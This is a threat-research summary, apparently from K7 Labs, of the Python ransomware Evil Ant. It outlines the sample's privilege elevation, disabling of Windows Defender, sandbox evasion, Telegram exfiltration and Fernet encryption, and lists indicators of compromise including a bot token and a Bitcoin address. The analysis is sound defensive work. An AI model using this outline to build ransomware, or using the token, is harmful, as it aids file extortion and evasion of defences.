Threat Research

Python Ciphering : Delving into Evil Ant’s Ransomware’s Tactics – K7 Labs

K7computing

K7Labs analysed a Python-based ransomware called Evil Ant that is packed with PyInstaller, hides its UI, escalates privileges, disables Windows Defender, and sends system details to a Telegram bot before encrypting files with a Fernet key. The sample contains a hard-coded unlock key and C2 details including a Telegram bot token, channel ID, contact email, and a Bitcoin payment address. #EvilAnt #K7Labs

Keypoints

  • Sample is a Python application packaged with PyInstaller; pyc files were extracted and s13.pyc identified as the entry point.
  • Ransomware hides its console window via Windows DLL APIs and attempts to relaunch itself with administrative privileges using the ‘runas’ verb and ShellExecuteW.
  • It disables Windows Defender by executing a PowerShell command and checks PROCESSOR_IDENTIFIER to avoid running in virtualized/sandbox environments.
  • System and IP information are sent to a Telegram bot via the Telegram API using an embedded bot token and channel ID.
  • Files are encrypted using a Fernet-generated key stored in a global variable; ALL() enumerates drives and targets specific directories, and bak() encrypts .bak files.
  • The sample changes the desktop wallpaper and displays a blue-screen style ransom UI with an unlock input that must match a hard-coded key for decryption.
  • Decryption is implemented using the same Fernet key, but interrupting the process (e.g., shutting down mid-decrypt) can permanently prevent recovery.

MITRE Techniques

  • [T1027] Obfuscated Files or Information – Use of PyInstaller packing to conceal Python bytecode (‘Evil Ant ransomware is packed by pyinstaller’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Uses PowerShell to modify system defenses (‘disables Windows Defender by executing a PowerShell command’).
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Disables Windows Defender to avoid detection (‘disables Windows Defender by executing a PowerShell command’).
  • [T1548] Abuse Elevation Control Mechanism – Attempts to obtain administrative privileges by relaunching with the ‘runas’ verb via ShellExecuteW (‘the use of the ‘runas’ verb along with ShellExecuteW API … the program can be relaunched with administrative privilege’).
  • [T1497.001] Virtualization/Sandbox Detection – Detects and exits on virtualized environments by checking system environment variables (‘examining the environment variable PROCESSOR_IDENTIFIER and exits … If it is executed on the virtual machine, it exits without being executed’).
  • [T1071.001] Application Layer Protocol: Web Protocols – Exfiltrates system and IP information by calling the Telegram API (‘IP and system information are being sent to a Telegram bot through the Telegram API’).
  • [T1486] Data Encrypted for Impact – Encrypts victim files using a Fernet-generated key stored globally (‘uses an auto generated key using Fernet to encrypt the file contents’).

Indicators of Compromise

  • [Hash] Detection context – ac612b8f09ec1f9d87a16873f27e15f0 (labeled Trojan / detection entry in article)
  • [C2 / Telegram] Command-and-control context – bot token 6893451039:AAGMOfYl9-RF8rfOKQUSizMAqvr28TKmgpY, channel ID -1002134979192, and API URL https://api[.]telegram[.]org/bot6893451039:AAGMOfYl9-RF8rfOKQUSizMAqvr28TKmgpY/sendMessage
  • [Email] Actor contact – [email protected]
  • [Crypto payment] Ransom payment address – Bitcoin 3CLUhZqfXmM8VUHhR3zTgQ8wKY72cSn989

The technical entry point was a PyInstaller-packed Python binary; analysts extracted pyc modules (notably s13.pyc) and decompiled them to reveal runtime logic. The sample hides its console by calling Windows DLL APIs and uses ShellExecuteW with the ‘runas’ verb to relaunch with elevated privileges when necessary. It contains guardrails to detect virtualized or analysis environments by inspecting PROCESSOR_IDENTIFIER and will exit if it identifies a VM.

To evade detection and transmit reconnaissance, the malware executes a PowerShell command to disable Windows Defender and posts system/IP details to a Telegram bot via the Telegram API using an embedded bot token and channel ID. For impact, it auto-generates a Fernet key (stored in a global variable by MAGIC()), enumerates drives and user paths via an ALL() routine, and encrypts target files — including .bak files via a bak() function — using the Fernet library. It also changes the desktop wallpaper and presents a blue-screen style ransom UI that accepts an unlock key.

Decryption is implemented: an unlock() function uses the previously generated Fernet key to read encrypted files in binary, decrypt them, and rewrite original content. The sample contains a hard-coded unlock key that must match user input to start decryption, and the process is fragile — if interrupted (for example by a shutdown) the decryption can fail permanently. Read more: https://labs.k7computing.com/index.php/python-ciphering-delving-into-evil-ants-ransomwares-tactics/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint